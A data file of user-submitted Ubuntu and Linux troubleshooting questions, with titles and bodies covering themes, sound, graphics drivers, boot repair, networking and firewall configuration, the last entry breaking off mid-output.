428499	theme identification ( ubuntu 11.10 ) and file location unknown !	where can i find the directory and files , related to the theme above , which i believe is part of kde ( but i am not to sure about that ) ? ! i 'd like to make some changes , just like : integrating some , but not all applications ( that use the current theme as shown in the screen shot ) to my standard and preferred dark gtk theme . changing the highlight bar , button-prelight + pressed and scrollbar color . making some pictographic and/or code based changes , related to button and tab-shading , the scrollbar , roundness of single elements etc.. applications , that use the same theme : synaptic package manager geany gimp and others.. any pointer in the right direction is highly appreciated ! -- thanks ! edit : i already use gnome-tweak-tool , gconf & dconf editor , to customize and setup themes , fonts , icons etc . but in this case to no avail . i also know , where themes and icons are located on my system , but i ca n't figure it out for the theme in question . it is no qt3/qt4 theme either ! thank you for your answer so far .
428500	how to add time stamp when using ffmpeg video recorder ?	is there any option , that let a user record a video with a time stamp . i use many web-cam recording and i did n't found this option . program i used guvcview , cheese . any help ?
428503	sound wo n't work with soundblaster audigy fx pcie card	to start , i am a complete linux noob trying out ubuntu to see if i can use it as my primary os . perfectly willing to put work into getting it setup , but i 'm running into an issue that i ca n't find a solution to . i 've seen some similar questions asked but none with quite the same issue . the question : i installed a brand new copy of ubuntu 13.10 . i have a soundblaster audigy fx model sb1570 installed that works fine in windows 7 . granted , it has a windows 7 driver and i ca n't seem to find a linux driver for said card . what can i do ? p.s . i have never messed with linux before but i 'm not a pc novice . and i know how to use google , it just has n't helped me much here .
428505	installed programs not displayed on desktop	ubuntu installs certain software . any other programs are not displayed on the desktop . how can i place them on desktop to use ?
428506	restoring ubuntu to its 'fresh install state '	i am recently started using ubuntu . i installed a 12.04 lts . some where on internet i read about softwhere mapping . my friend had his ubuntu running fine so he mapped his ubuntu ( using aptoncd ) to my fresh installation . after it completed i had some of third party softwares installed on my ubuntu . but when i try to install using apt-get i get unmet dependency error . and when i try to resolve it using commands suggested by ubuntu community . i get stuck some place . so what i want now is restore my ubuntu to a state as it was when i did a fresh install . is there a way to restore my ubuntu to its fresh install state without re-installing . i do not have any important files .
428509	how do i install the latest psi-plus on kubuntu 12.04 lts ?	psi+ is a cross-platform powerful jabber client . i 'm on 12.04 lts . the psi-plus version in the repos is from 2011 , which is much too old . see below : $ apt-cache policy psi-plus psi-plus : installed : ( none ) candidate : 0.15~svn3910-2 version table : 0.15~svn3910-2 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/universe amd64 packages i want the latest version . what is the best way to install it so that i can keep it up to date ( along with any plugins too ) ? i do n't see a ubuntu or debian version here : http : //sourceforge.net/projects/psiplus/files/ i am ok with using git clone if there is a simple way to get the `` complete '' package ( i.e. , just clone one url ) .
428511	soundcard is not working	system : kubuntu 12.04 lts / 32bit i performed the following steps already : lshw : audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:41 memory : f0100000-f0103fff cat /proc/asound/cards : 0 snd_hda_intel alsa reload : unloading alsa sound driver modules : snd-seq-midi snd-rawmidi snd-seq-midi-event snd-seq snd-seq-device snd-hda-intel snd-hda-codec-realtek snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-timer . loading alsa sound driver modules : snd-seq-midi snd-rawmidi snd-seq-midi-event snd-seq snd-seq-device snd-hda-intel snd-hda-codec-realtek snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-timer . after this steps the sound hardware should work , but did n't . i tried to configure the sound card with the phenon control module but this is not possible . maybe someone can help me .
428512	my graphic drivers are gone	i am on xubuntu 13.10 64 bit . this question tells you everything you need to know about my graphic card . yesterday i had a problem , my graphic card driver failed , now if i login to xubuntu default desktop , all i see is a black screen however i can login to xfce session the output of inxi -g : graphics : card-1 : intel 2nd generation core processor family integrated graphics controller card-2 : advanced micro devices [ amd/ati ] seymour [ radeon hd 6400m/7400m series ] x.org : 1.14.5 drivers : fglrx , intel resolution : 1366x768 @ 60.0hz glx renderer : amd radeon hd 6400m series glx version : 4.2.12337 - cpc 13.101 xsession-errors script for cjkv started at run_im . script for default started at run_im . openconnection : connect : no such file or directory can not connect to brltty at :0 xsession : x session started for elie at mon mar 10 10:16:26 eet 2014 localuser : elie being added to access control list openconnection : connect : no such file or directory can not connect to brltty at :0 script for cjkv started at run_im . script for default started at run_im . script for cjkv started at run_im . script for default started at run_im . libgl error : failed to load driver : i965 libgl error : try again with libgl_debug=verbose for more details . gnome-session-is-accelerated : llvmpipe detected . x-session-manager [ 2113 ] : critical : we failed , but the fail whale is dead . sorry ... . xsession : x session started for elie at mon mar 10 10:17:23 eet 2014 localuser : elie being added to access control list openconnection : connect : no such file or directory can not connect to brltty at :0 script for cjkv started at run_im . script for default started at run_im . script for cjkv started at run_im . script for default started at run_im . libgl error : failed to load driver : i965 libgl error : try again with libgl_debug=verbose for more details . gnome-session-is-accelerated : llvmpipe detected . x-session-manager [ 2466 ] : critical : we failed , but the fail whale is dead . sorry ... . /var/log/xorg.0.log.old and /etc/x11/xorg.conf . note that i no longer have xorg.conf , because i followed the answers below , but even if i generate new file , it will be looking like the file above , i tried it .
428513	wget and encoded url	i have a url like this : http : //dl.minitoons.ir/longs/khumba ( 2013 ) [ en ] [ br-rip 720p ] - [ www.minitoons.ir ] .rar i want to download this url using wget . if i pass it directly to wget , everything goes well . but i am in a situation that i have only the encoded versions of download urls . if i pass the encoded version of the url above to wget , it throws the following error : $ wget `` http % 3a % 2f % 2fdl.minitoons.ir % 2flongs % 2fkhumba % 20 ( 2013 ) % 20 % 5ben % 5d % 20 % 5bbr-rip % 20720p % 5d % 20- % 20 % 5bwww.minitoons.ir % 5d.rar '' wget : unable to resolve host address `http : //dl.minitoons.ir/longs/khumba ( 2013 ) [ en ] [ br-rip 720p ] - [ www.minitoons.ir ] .rar' notice that wget changed the casing of url ( for example khumba to khumba ) . what should i do to solve this problem ?
428516	ubuntu 12.04 installer not detecting windows 7	i am trying to install ubuntu 12.04 alongisde windows 7 which is already installed on my computer . i have a lenovo thinkpad t430s . when i perform a live boot of ubuntu from a flash drive , i am able to connect to the internet and it seems to run fine but when i run the installer on the ubuntu desktop , it says there are no operating systems currently installed on my computer . there is no option to install ubuntu alongside windows . i have run boot repair and here is the resulting url : http : //paste.ubuntu.com/7023830/ i am totally new to linux and would really appreciate some help figuring this out .
428517	int system call and 'int ' within c syntax	i 'm learning about kernels and i was curious if the int system call ( in our case , in linux ) has any connection with the declaration of an integer in c and c-based languages . int n ; is an integer declaration a system call made by the process ( the running program ) to the kernel in order to allocate memory within its own address space ? i do n't understand if the program needs the kernel to allocate memory in the pages the program holds or not . it sounds reasonable that the program can do this by itself , as it could use the memory within its own pages as it wishes , asynchronously ( in regards to other processes ) . however , i 'm thinking that in case it needs extra space during its execution , it has to interact with the kernel , and therefore int could be a system call .
428519	ca n't execvp `` no such file or directory `` error in geany editor	i am getting this error in geany editor while executing a simple program : ca n't execvp `` no such file or directory `` i want to set xterm as geany terminal emulator . but i think i 've accidentally screwed up my shell path . can anybody provide me with the default shell path of geany .
428520	server upgrade fails , boot partition too small	the upgrade from ubuntu 12.10 to 13.10 aborts right after starting , due to the /boot partition having only 54mb size . the server has 2 hard disks with 2 partitions each , being connected via raid1 . since the server is located in a datacenter , it can not be booted with a live system disk , to use gparted . the rescue system , loaded via network , does not access the hard disk ( fdisk -l is empty there ) . question being : how can i make /boot bigger , so the initial ram disks fit into ( suggested : 300mb ) ? do-release-upgrade shows this : not enough free disk space the upgrade has aborted . the upgrade needs a total of 55.2 m free space on disk '/boot ' . please free at least an additional 29.2 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . uname -r shows this : 3.5.0-47-generic dpkg -l linux-im* shows this : desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-======================================-========================-========================-================================================================================= un linux-image < none > ( no description available ) un linux-image-2.6 < none > ( no description available ) un linux-image-2.6.24-16-server < none > ( no description available ) un linux-image-2.6.24-23-server < none > ( no description available ) un linux-image-2.6.24-24-server < none > ( no description available ) un linux-image-2.6.24-25-server < none > ( no description available ) un linux-image-2.6.24-28-server < none > ( no description available ) rc linux-image-2.6.32-32-generic-pae 2.6.32-32.62 i386 linux kernel image for version 2.6.32 on x86 rc linux-image-2.6.32-45-generic-pae 2.6.32-45.104 i386 linux kernel image for version 2.6.32 on x86 rc linux-image-2.6.32-46-generic-pae 2.6.32-46.108 i386 linux kernel image for version 2.6.32 on x86 rc linux-image-2.6.32-47-generic-pae 2.6.32-47.109 i386 linux kernel image for version 2.6.32 on x86 rc linux-image-2.6.32-48-generic-pae 2.6.32-48.110 i386 linux kernel image for version 2.6.32 on x86 rc linux-image-2.6.32-53-generic-pae 2.6.32-53.115 i386 linux kernel image for version 2.6.32 on x86 rc linux-image-2.6.32-54-generic-pae 2.6.32-54.116 i386 linux kernel image for version 2.6.32 on x86 rc linux-image-2.6.32-55-generic-pae 2.6.32-55.117 i386 linux kernel image for version 2.6.32 on x86 un linux-image-3.0 < none > ( no description available ) ii linux-image-3.5.0-47-generic 3.5.0-47.71 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-extra-3.5.0-47-generic 3.5.0-47.71 i386 linux kernel image for version 3.5.0 on 32 bit x86 smp ii linux-image-generic 3.5.0.47.63 i386 generic linux kernel image ii linux-image-generic-pae 3.5.0.47.63 i386 transitional package ls -la /boot shows this : total 26028 drwxr-xr-x 4 root root 2048 mar 1 14:24 . drwxr-xr-x 26 root root 4096 mar 1 14:23 .. -rw -- -- -- - 1 root root 2324217 feb 19 01:28 system.map-3.5.0-47-generic -rw-r -- r -- 1 root root 862198 feb 19 01:28 abi-3.5.0-47-generic -rw-r -- r -- 1 root root 154687 feb 19 01:28 config-3.5.0-47-generic drwxr-xr-x 2 root root 1024 mar 1 14:23 grub -rw-r -- r -- 1 root root 18016141 mar 1 14:24 initrd.img-3.5.0-47-generic drwx -- -- -- 2 root root 1024 jul 30 2011 lost+found -rw -- -- -- - 1 root root 5175536 feb 19 01:28 vmlinuz-3.5.0-47-generic df -h shows this : filesystem size used avail use % mounted on /dev/md1 458g 161g 275g 37 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 809m 304k 809m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 0 2.0g 0 % /run/shm none 100m 0 100m 0 % /run/user /dev/md0 54m 26m 25m 51 % /boot fdisk -l shows this : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00024aac device boot start end blocks id system /dev/sda1 * 63 112454 56196 fd linux raid autodetect /dev/sda2 112455 2216969 1052257+ 82 linux swap / solaris /dev/sda3 2216970 976768064 487275547+ fd linux raid autodetect disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002518c device boot start end blocks id system /dev/sdb1 * 63 112454 56196 fd linux raid autodetect /dev/sdb2 112455 2216969 1052257+ 82 linux swap / solaris /dev/sdb3 2216970 976768064 487275547+ fd linux raid autodetect disk /dev/md1 : 499.0 gb , 498970066944 bytes 2 heads , 4 sectors/track , 121818864 cylinders , total 974550912 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md1 does n't contain a valid partition table disk /dev/md0 : 57 mb , 57475072 bytes 2 heads , 4 sectors/track , 14032 cylinders , total 112256 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table cat /proc/mdstat shows this : personalities : [ raid1 ] [ linear ] [ multipath ] [ raid0 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid1 sda1 [ 0 ] sdb1 [ 1 ] 56128 blocks [ 2/2 ] [ uu ] md1 : active raid1 sdb3 [ 1 ] sda3 [ 0 ] 487275456 blocks [ 2/2 ] [ uu ] unused devices : < none > lspci -v | grep raid shows this : 01:0e.0 raid bus controller : broadcom bcm5785 [ ht1000 ] sata ( native sata mode ) ( prog-if 05 )
428522	path variable is reseting itself	every time i close my terminal and reopen it , simples command ( e.g . ls ) does n't work . it shows the following error , irfan @ irfan-y500-elementery : ~ $ ls command 'ls ' is available in '/bin/ls' the command could not be located because '/bin ' is not included in the path environment variable . ls : command not found i have to execute the following command export path=/usr/bin : /bin every time to correct this error , irfan @ irfan-y500-elementery : ~ $ export path=/usr/bin : /bin irfan @ irfan-y500-elementery : ~ $ ls assets documents example.java music public videos blender downloads export output.pdf sudo desktop elementary luna jmonkeyplatform pictures templates my questions is , why i have to do it every time ? and what do i have to do to solve the repetition . my /etc/environment files contains the following , path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' clutter_paint=disable-clipped-redraws : disable-culling note : i am using elementaryos ( based on ubuntu 12.04 ) edit 1 : echo $ path returns /usr/local/jre1.7.0_51/bin : i followed this answer to set java path . i added path=/usr/local/jre1.7.0_51/bin : export path to my /home/irfan/.bashrc file . i guess this caused the problem
428525	no sound , ubuntu 12.04 lts	edit : sweet mary , i figured it out ! ! there are some volume shortcut keys on my laptop - they 've been the problem this whole time : / i always thought that they just did n't work in ubuntu because there is n't any visual feedback when you press them . that said , should i `` undo '' any of the things i tried below ? clean-installed roughly a week ago , and i had sound , but it suddenly stopped a while ago and seemingly out of the blue . i 'm assuming the change must have happened sometime around when i was letting the update manager do it 's thing . i 'm chugging away on a lenovo t-60 thinkpad laptop , so the sound card is on-board . i 've tried this : no sound in 12.04 lts ubuntu and this . the accepted answer here : sound not working after 12.04 install as well as killall pulseaudio this seems to be a common problem and sometimes some of the guides do n't seem entirely trustworthy , so if someone could point me in the right direction , that 'd be excellent .
428534	only killing eth0 enables internet	i connect to wifi and ifconfig report 3 interfaces ( lo , eth0 and wlan0 ) , but i can not ping anything , including the router . only after ifconfig eth0 down i get to actually use the internet . what is going on ? how do i avoid this problem ? my /etc/network/interfaces : auto lo wlan0 iface lo inet loopback route : before ifconfig eth0 down : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.7.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.7.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.7.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 after ifconfig eth0 down : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.7.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.7.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 ifconfig before ifconfig eth0 down : eth0 link encap : ethernet hwaddr 00:90 : f5 : a6:6c : de inet addr:192.168.7.100 bcast:192.168.7.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:45 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:430 errors:0 dropped:0 overruns:0 frame:0 tx packets:430 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:34157 ( 34.1 kb ) tx bytes:34157 ( 34.1 kb ) wlan0 link encap : ethernet hwaddr 74 : f0:6d:27:3e:4d inet addr:192.168.7.156 bcast:192.168.7.255 mask:255.255.255.0 inet6 addr : fe80 : :76f0:6dff : fe27:3e4d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8 errors:0 dropped:0 overruns:0 frame:0 tx packets:58 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:878 ( 878.0 b ) tx bytes:10870 ( 10.8 kb ) after ifconfig eth0 down : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1435 errors:0 dropped:0 overruns:0 frame:0 tx packets:1435 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:116494 ( 116.4 kb ) tx bytes:116494 ( 116.4 kb ) wlan0 link encap : ethernet hwaddr 74 : f0:6d:27:3e:4d inet addr:192.168.7.156 bcast:192.168.7.255 mask:255.255.255.0 inet6 addr : fe80 : :76f0:6dff : fe27:3e4d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:63915 errors:0 dropped:0 overruns:0 frame:0 tx packets:50926 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:95400944 ( 95.4 mb ) tx bytes:4750543 ( 4.7 mb )
428536	ubuntu 13.10 completely frozen after login and nothing appear just bascground	i installed ubuntu . firstly my system shows black/purple screen after login , i seached on net and someone refers as gpu driver proplem so i made changes in command line as '' nomodeset '' . after that i was able to login but after login ubuntu stucks ! system info ! nvidia gt 240 intel g41vw intel q9400
428540	wd mycloud 2tb personal cloud storage	i bought a 2tb western digital my cloud personal cloud storage device . it is currently supported by mac os and windows only . is there a way to use it with ubuntu 12.04 ?
428541	redirect user to a sub folder after logging in ftp	i want to redirect user after sftp log in to public_html folder . i have tried this script in vsftpd.conf user_sub_token= $ user local_root=/home/ $ user/public_html listen=yes this does not work does anyone know the reason why ?
428542	how can i run etherape without needing to use sudo ?	it 's simple enough to grant myself the privileges wireshark needs : can i do the same with etherape ?
428544	eliminate graphic tearing	i am using ubuntu 12.04 . i have been able to get rid of tearing while using xbmc but i would like to get rid of it on youtube videos as well . i installed compizconfig and tried some settings someone had recommended with no luck . i am running an ati/amd graphics card .
428545	how can i make centering images in libreoffice impress easier ?	centering images manually in libreoffice impress can be very tedious . is there any way i can automate it or make it easier ?
428550	bluetooth not working in 13.10 ( lubuntu )	i have just installed ubuntu 13.10 on my acer e1 572 laptop ( i5 , 4200u ) . ( i also installed lxde desktop ) . unfortunately bluetooth is not working . i recently installed blueman , and still no luck . all suggestions are most appreciated ! thanks
428551	laptop fan constantly running at a high speed	i am very new to ubuntu and to linux as well . i installed ubuntu 13.10 on my dell inspiron 15r laptop . ( intel i7 processor , 8gb ram ) . however the fan constantly running at a very high speed irrespective of the application that i am working on . it does not slowdown for a second even . could anyone please help me to get this solved . i 'll be truly grateful if anyone can help me out in this regard .
428556	ubuntu 12.04 black boot screen and boot-repair failed	i can not boot ubuntu 12.04 after from a copy of my virtualbox file . i am getting a `` gnu grub version 1.99-12ubuntu5 '' screen with these options : ubuntu , with linux 3.0.0-24-generic ubuntu , with linux 3.0.0-24-generic ( recovery mode ) previous linux versions memory test ( memtest 86+ ) memory test [ ... ] choosing option 1 or 2 leads me directly to a black screen . trying to fix this , i started with an ubuntu live cd and run boot-repair . unfortunately , boot-repair failed with this link . http : //paste.ubuntu.com/7024127/ now i am stuck . best regards
428559	live version works fine , but installation crashes	so i decided to install ubuntu 13.10 via usb drive . downloaded *.iso file , then used a program to create liveusb . then rebooted to check if it works fine and it did . i got impressed and decided to install ubuntu . after installation process started , i was asked if i want to erase all of the data and i clicked 'yes ' . i named myself , pc , password , keyboard language and all of the stuff . after installation process started , i received an error and sorry . now i do n't have any os , but liveusb still works fine . and i 'm using it to ask this question : what are my options ? i still want to install ubuntu . i tried downloading new iso file and write it down to another usb drive , but it says i ca n't use it . i tried launching installation several times , with same result . i suspect i have corrupted files on my usb drive , but i ca n't fix it anyhow . i tried downloading iso file again and installing it out of liveusb , but it says i have no rights to mount iso file .
428563	how to get out of initrams command line	i just installed ubuntu os on my mac and whenever i run it , it goes straight to command line . how do i get to the desktop ?
428564	how could i add a status bar that shows if it safe to remove my external hard drive ?	whenever i want to remove my hard drive i never know when i can safely remove it . how do i add a status bar that indicates when ?
428565	ubuntu-mac dual-boot - after deleting ubuntu grub blocks my way	a few months ago i installed ubuntu ( i think 12.0.8 ) on my macmini ( it was 10.6.8 than and is now 10.9 ) . since then i have reshaped my partitions about two times - including overwriting them with zeros . i deleted efi and never thought about ubuntu again . and now , after restarting my mac ( which i did hundreds of times before ) now it says gnu grub version 1.99-21ubuntu3.10 minimal bash-line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completion . grub so , i would like to get rid of grub and ubuntu which is not allowing me to boot into my mac and i would like to access my mac and its data again ... thank you very much for your help !
428567	os-uninstaller saying i will need to update my bootloader ?	i am following these instructions to remove ubuntu 13.10 from my system : https : //help.ubuntu.com/community/os-uninstaller but when i run os-uninstaller instead of just saying it will remove the ubuntu 13.10 it also says i will need to update my bootloader . i thought the point of this tool was so that it removes the os and does everything else automatically ? i am unsure how to proceed .
428568	aggregation not enabled for did because load =6	my computer running 12.04.4 boots to a black login screen . i have gotten different load = error messages as well as a broken pipe message . i can not even attempt to type a password on the login for some reason . helppppppppp please .
428569	i have an xp cpu 2004 dimension 2400 intel celeron 2.40ghz , 400 fsb 512mb shared ddr sdram @ 333mhs + additonal drive of 500 mb`	i would like to know which unbuntu would work with my system . how to go about loading it into my cpu . thanks for your help . ralph
428571	trying to share internet on non-adhoc wifi , not working	the usual situation : android phones do n't like ad-hoc networks , so i 'm trying to make ubuntu act as hotspot with a non-ad-hoc network instead . i 'm on a fresh install of whatever version of ubuntu the official download page gave me . i started by following this how do i create a non-adhoc wifi hotspot ? guide , but it does n't work . ( when i run iwconfig i get eth1 instead of wlan0 as my wifi , so i 've replaced wlan0 with eth1 in all the instructions in the link above . and i 've had to do sudo apt-get install hostapd to get hostapd , but that seems to have worked ) when i do sudo hostapd -b /etc/hostapd/hostapd.conf i get nl80211 : failed to set interface eth1 into ap mode nl80211 driver initialization failed . eloop : remaining socket : sock=4 eloop_data=0x8413900 user_data=0x8413ea8 handler=0x807c5e0 eloop : remaining socket : sock=6 eloop_data=0x8416420 user_data= ( nil ) handler=0x8086770 this is my first time trying to set anything up in a linux environment , so i have no idea what 's going wrong or where to look for clues as to how to proceed . just now , i noticed this failed to set interface wlan0 into ap mode : intel centrino n1000 wireless in the list to the right of where i 'm typing this question . i did the sudo iwconfig eth1 mode master . ( is the period supposed to be there ? tried without , same result ) and got error for wireless request `` set mode '' ( 8b06 ) : set failed on device eth1 ; invalid argument . and there 's no ap in the list of supported modes . does this mean i 'm doomed ? trying to dig further on my own , i found http : //nims11.wordpress.com/2012/04/27/hostapd-the-linux-way-to-create-virtual-wifi-access-point/ and at one point it tells me to run lspci -k | grep -a 3 -i `` network '' , from which i find kernel driver in use : ipw2200 , which when input in the next command modinfo ipw2200 | grep 'depend ' gives me depends : cfg80211 , libipw , lib80211 . this does not include mac80211 which is the one specifically mentioned in the link as supported . i have not been able to figure out if any of the ones i do get are supported or not .
428574	12.04 change gnome 's `` add to panel '' shortcut	in gnome-classic , is there anyway to change gnome 's add to panel short-cut ? in this version , you have to use super+alt+r-click . i have a old kinesis keyboard that does not give easy access to the super key . i do not see a setting for it under applications > system tools > system settings > keyboard . open the `` shortcuts '' tab .
428577	my ubuntu software center wont stop trying to cancel a process	it says searching and wont stop trying to cancel said process ... . how do i fix that ? i have tried to bypass it using several means of apt-get kill all and some threads i have read on here . but again i am not an expert with ubuntu , i have used windows os since i stared with computers a friend put it on a spare hard drive i had and i wanted to try it out . any help would be much appreciated .
428579	i ca n't get my netgear wnda4100 to recognize in 13.10	i read the thread on compiling a driver for the netgear wnda4100 and , frankly , it 's a bit over my head . looking for a bit simpler instruction on how to get my netgear wnda4100 to work in 13.10 . help !
428583	what prevents a user process from writing at random positions in memory and damage the os or other processes ?	why ca n't the following code damage memory ? int x ; while ( 1 ) { x = rand ( ) ; //assuming that the address space has the size of an int *x = 0 ; } i know that each process has a virtual address space , but as long as it 's changing random addresses it 's got to 'hit ' something . or does the process need to do a system call for each and every time it writes something to memory ? that seems implausible , as it will make any process extremely inefficient as almost every instruction writes to memory . if the process does n't call the kernel for every write , then the kernel ca n't know where the process will write and ca n't prevent the process from writing in a restricted area .
428584	ufw is deny/deny , but packets are still getting out of my ethernet device . why is this ?	hello , i have a question . i would like to use the ufw ubuntu firewall to lock both input and output completely from the server to ensure no packets are sent initially as a baseline . i enabled ufw , and used gufw to set both send/recv to deny/deny , but when performing tcpdump ... . i still see packets . why is this ? root @ ubuntu12 : ~ # tcpdump -i eth0 tcpdump : verbose output suppressed , use -v or -vv for full protocol decode listening on eth0 , link-type en1mb ( ethernet ) , capture size 65535 bytes 00:18:13.546778 ip 13.14.3.22.https > 192.168.1.11.53742 : flags [ p. ] , seq 61669:25111754 , ack 55373 , win 1334 , length 60 00:18:13.583974 ip 192.168.1.11.53742 > 13.14.3.22.https : flags [ . ] , ack 60 , win 330 , length 0 00:18:16.368458 ip 192.168.1.11.37884 > 11.21.4.13.40029 : flags [ p. ] , seq 1557077:1525079 , ack 3451606 , win 331 , options [ nop , nop , ts val 667792 ecr 4834388 ] , length 2 00:18:16.476004 ip 16.1.4.13.4009 > 192.168.1.11.384 : flags [ . ] , ack 2 , win 83 , options [ nop , nop , ts val 483331 ecr 667752 ] , length 0 the configuration of ufw firewall : $ sudo grep '^ # # # tuple ' /lib/ufw/user*.rules /lib/ufw/user.rules : # # # tuple # # # deny tcp 443 0.0.0.0/0 any 0.0.0.0/0 in /lib/ufw/user.rules : # # # tuple # # # deny udp 4444 0.0.0.0/0 any 0.0.0.0/0 in /lib/ufw/user.rules : # # # tuple # # # deny tcp 6881:6891 0.0.0.0/0 any 0.0.0.0/0 in /lib/ufw/user.rules : # # # tuple # # # deny udp 6881:6891 0.0.0.0/0 any 0.0.0.0/0 in in /lib/ufw/user.rules : # # # tuple # # # deny any 53 0.0.0.0/0 any 0.0.0.0/0 in /lib/ufw/user.rules : # # # tuple # # # deny any 631 0.0.0.0/0 any 0.0.0.0/0 cups - in $ ufw status status : active to action from -- -- -- -- -- -- 51413/tcp deny anywhere 51413/udp deny anywhere 443/tcp deny anywhere 6881/tcp deny anywhere 6881/udp deny anywhere 2234:2239/tcp deny anywhere 2242/tcp deny anywhere 2240/tcp deny anywhere 4444/udp deny anywhere 4662/tcp deny anywhere 4672/udp deny anywhere 53 deny anywhere $ sudo ufw show raw ipv4 ( raw ) : chain input ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 1 40 accept tcp -- * * 127.0.0.1 0.0.0.0/0 tcpflags : ! 0x17/0x02 205761 27027186 accept udp -- * * 127.0.0.1 0.0.0.0/0 2 141 accept all -- lo * 0.0.0.0/0 0.0.0.0/0 0 0 accept icmp -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 10/sec burst 5 77235 9359718 drop all -- eth0 * 0.0.0.0/0 255.255.255.255 170607 17948324 drop all -- * * 0.0.0.0/0 192.168.0.255 0 0 drop all -- * * 224.0.0.0/8 0.0.0.0/0 0 0 drop all -- * * 0.0.0.0/0 224.0.0.0/8 0 0 drop all -- * * 255.255.255.255 0.0.0.0/0 0 0 drop all -- * * 0.0.0.0/0 0.0.0.0 1564 289698 drop all -- * * 0.0.0.0/0 0.0.0.0/0 state invalid 0 0 lsi all -f * * 0.0.0.0/0 0.0.0.0/0 limit : avg 10/min burst 5 3759890 3187820179 inbound all -- eth0 * 0.0.0.0/0 0.0.0.0/0 18258 1735226 log_filter all -- * * 0.0.0.0/0 0.0.0.0/0 18258 1735226 log all -- * * 0.0.0.0/0 0.0.0.0/0 log flags 0 level 6 prefix `` unknown input '' 18258 1735226 ufw-before-logging-input all -- * * 0.0.0.0/0 0.0.0.0/0 18258 1735226 ufw-before-input all -- * * 0.0.0.0/0 0.0.0.0/0 18258 1735226 ufw-after-input all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 ufw-after-logging-input all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 ufw-reject-input all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 ufw-track-input all -- * * 0.0.0.0/0 0.0.0.0/0 chain forward ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 0 0 accept icmp -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 10/sec burst 5 0 0 log_filter all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 0.0.0.0/0 0 0 ufw-before-forward all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 ufw-after-forward all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 ufw-after-logging-forward all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 ufw-reject-forward all -- * * 0.0.0.0/0 0.0.0.0/0 chain output ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 5/sec burst 5 log flags 0 level 6 prefix `` outbound `` 0 0 reject all -- * * 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable chain ufw-before-input ( 1 references ) pkts bytes target prot opt in out source destination 0 0 accept all -- lo * 0.0.0.0/0 0.0.0.0/0 0 0 accept all -- * * 0.0.0.0/0 